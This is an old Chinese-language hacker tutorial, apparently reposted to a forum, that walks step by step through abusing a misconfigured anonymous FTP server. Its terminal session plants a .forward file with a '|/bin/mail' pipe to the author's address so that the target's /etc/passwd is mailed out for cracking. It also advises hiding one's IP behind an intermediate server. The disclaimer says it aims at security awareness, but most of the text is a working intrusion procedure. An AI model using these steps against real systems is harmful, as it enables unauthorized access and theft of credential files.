Love-gone 著
[前言]
对於著作这份文章的目的不是在於教育.因为个人觉得台湾的网路虽然已经有所发展了...但是对於网路安全的重要性却是漠不关心..或者是没有足够的知识....这是相当危险的一个现象..就算是大专院校.政府机构.公司行号...甚至是网路业者.ISP对於网路安全和系统管理的正确观念和态度实在是相当缺乏...所以说不定在往后的日子,只要一cp和一数据机,就可以让整个台湾网路崩溃....甚至是引起经济危机!!就像是一个小孩子拿著一把枪在路上逛一样...Too Bad!!所以我写这篇文章纯粹是为了台湾网路安全而写的.不希望有人因为这篇文章而去做违法的事情~~尤其是破坏别人的系统或是档案!!当然啦~如果有人因此做了违法的事情,本人概不负责!!!"水能载舟也覆舟"....只是告诉你骇客是如何入侵你的系统.好像说要做F&Q..如果位对於网路系统安全有问题的可以写信来问我!!当然我也不是GOD不是说每一个问题我一定会~~但是我会尽力回答每一个人的问题,不会说不知道就假装没看到这个问题,ok?
[主题]
匿名FTP的漏洞 (Anonymous FTP)
[困难度]
普通
[说明]
目前有很多的主机都有提供匿名FTP的服务,而方便和安全性却是鱼与熊掌不能两得的!!就像我以前说的,现在的系统管理员大多数都是缺少专业观念的!!!对於FTP也是一样,很多系统管理员都为了避免麻烦就用系统的预设设定来提供FTP这个服务.而anonymous ftp却是有许多漏洞须要我们去探讨的.
哇~~今天说话的口气怎麽变得好专业阿!!
[开始]
今天就先说明一下湾目前anonymous ftp最常犯的错误!然而这些错误却常常是系统安全的大漏洞.
一开始先说明怎麽把整个/etc/passwd抓回来.再说明如何任意的不用密码就能进入系统.
如果ftp的根目录是可以写入的或是可以执行程式.那你就可以把系统的/etc/passwd给抓回来了!!方法就是先做一个传送档 .forward,然ftp到主机上用anonymous进入.把你做的.forward 上传到它的根目录下.确定上传完毕就可以离开了!在寄一封e-mail给那个主机的anonymous的帐号..大多帐号是ftp!然你就可以去收收你的信箱了..什麽还不懂阿?意思就是说/etc/passwd已经传到你的信箱了啦!赶快存好,拿约翰出来跑路吧!!
其方法说明如下:
SunOS 5.6
login: lovegone
Password:
Last login: Sat May 16 19:07:41 from 11.22.203.122
tcsh: getwd: Cannot open directory "../" (Permission denied)
tcsh: Trying to start from "/home/judge4"
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
Copyright by Andrew Chen 98/01/07
You have new mail.
#
(嘿嘿..先连到我的中间伺服器! 有人问说[一定要先有一个主机来当中间伺服器才能hack别人的主机吗?].当然不是这个意思啦!先连上中间伺服器只是要用来掩饰自己的ip嘛!而且可以利用中间伺服器来使用Net-Man2所说的那些"中间动作"阿!!所以中间伺服器不是说一定要用,但是却是很重要喔..)
# finger @www.fuck.com.tw
[cc.fuck.com.tw]
Login Name TTY Idle When Where
root Super-User console 10: Tue 09:05 :0
(没人在家...真好)
# ftp www.fuck.com.tw
Connected to cc.fuck.com.tw.
220 cc FTP server (Version wu-2.4(1) Thu May 30 18:00:41 CST 1996) ready.
Name (www.fuck.com.tw:lovegone): anonymous (或是ftp,只要先匿名进去就好了)
331 Guest login ok, send your complete e-mail address as password.
Password:
230-
230- ###### ##### #####
230- # # # #
230- ##### # # #
230- # # #####
230- # # #
230- # # #
230-
230- **** 欢迎到fuck烂公司 ****
230-
230- IE40 : pub/ie40 : 正式版.非抢鲜版
230- pub/ie40zip: ie40 zip.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
(不愧是fuck烂公司.连ftp也都是wu-2.4的..漏洞大的"狠")
ftp> pwd
257 "/" is current directory.
(看一下自己在那,因为有些ftp会一开始就在帐号的工作目录下.我们要确保是在根目录下!如果不是在根目录下的人就用cd ..就可以到根目录了)
ftp> ls
(看根目录的设定)
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 18
drwxr-xr-x 7 fuck Taiwan 512 Oct 16 1997 .
drwxr-xr-x 7 fuck Taiwan 512 Oct 16 1997 ..
lrwxrwxrwx 1 fuck Taiwan 7 Jun 17 1997 bin -> usr/bin
dr-xr-xr-x 2 fuck Taiwan 512 May 31 1996 dev
d--x--x--x 2 fuck Taiwan 512 May 31 1996 etc
dr-xr-xr-x 15 ftp Taiwan 512 Feb 13 03:40 pub
drwxr-xr-x 2 ftp Taiwan 512 Apr 13 05:59 upload
drwxr-xr-x 5 fuck Taiwan 512 May 31 1996 usr
-rw-r--r-- 1 fuck Taiwan 488 Oct 8 1997 welcome.msg
226 Transfer complete.
("狠"好!根目录是drwxr-xr-x 可以执行程式.赶快去做一个.forward吧!!!)
ftp> bye
Goodbye!
# echo "|/bin/mail Lovegone@ms7.accmail.com.tw" > shit
(用echo和输出导向就可以了..)
# ls -la
total 26
drwxr-xr-x 4 lovegone users 1024 May 14 13:56 ./
drwxr-xr-x 47 root root 1024 Nov 26 14:08 ../
-rw-r--r-- 1 lovegone users 2217 May 14 13:56 .bash_history
-rw-r--r-- 1 lovegone users 164 Jun 10 1996 .kermrc
-rw-r--r-- 1 lovegone users 34 Jun 7 1993 .less
-rw-r--r-- 1 lovegone users 114 Nov 24 1993 .lessrc
drwxr-xr-x 2 lovegone users 1024 Jun 10 1996 .term/
-rw-rw-r-- 1 lovegone users 6116 May 7 1997 m-2.gif
-rw------- 1 lovegone users 9382 May 14 13:49 mbox
drwxr-xr-x 8 lovegone users 1024 Jul 28 1997 public_html/
-rw-r--r-- 1 lovegonw users 8 Jul 5 1998 shit
(ok了!!接下来就是把shit上传到www.fuck.com.tw上当.forward)
# ftp www.fuck.com.tw
Connected to cc.fuck.com.tw.
220 cc FTP server (Version wu-2.4(1) Thu May 30 18:00:41 CST 1996) ready.
Name (www.fuck.com.tw:lovegone): anonymous (或是ftp,只要先匿名进去就好了)
331 Guest login ok, send your complete e-mail address as password.
Password:
230-
230- ###### ##### #####
230- # # # #
230- ##### # # #
230- # # #####
230- # # #
230- # # #
230-
230- **** 欢迎到fuck烂公司 ****
230-
230- IE40 : pub/ie40 : 正式版.非抢鲜版
230- pub/ie40zip: ie40 zip.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put shit .forward
(上传记得要改成 .forward才行,别在用shit)
200 PORT command successful.
226 Transfer complete.
ftp> bye
Goodbye!
(寄一封信给anonymous这个帐号..然去收收你的信箱吧!)
[Love-gone的话]
想不到竟然只说了利用 .forward来传/etc/passwd的方法!至於任意进出系统而不用密码的方法就只好等下次再说了...别说我又偷懒了!
最近都没有继续的写文章了,必竟hack只是兴趣而已!而生活中却有很多事要做..好累人 :-(
虽然hack只是兴趣,但是love-gone却是很认真的哟 !! love-gone希望以后能够从事跟电脑相关的工作,但是台湾的填鸭式教育却让love-gone很吃力 :-(
希望love-gone还是能有空来帮喜欢hack的朋友写文章或回答问题 :-)
[感言]
还是老话一句...系统漏洞大都都是人为的疏失!!这是很重要的一点,希望是系统管理员的读者看到这文章能有所改进.
Love-gone的E-mail信箱: lovegone@ms7.accmail.com.tw
Love-gone的ICQ#: 12294548
这份文章的著作权是属於Love-gone所有.禁止任何人未经许可擅自破坏其文章的完整性.
5097
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
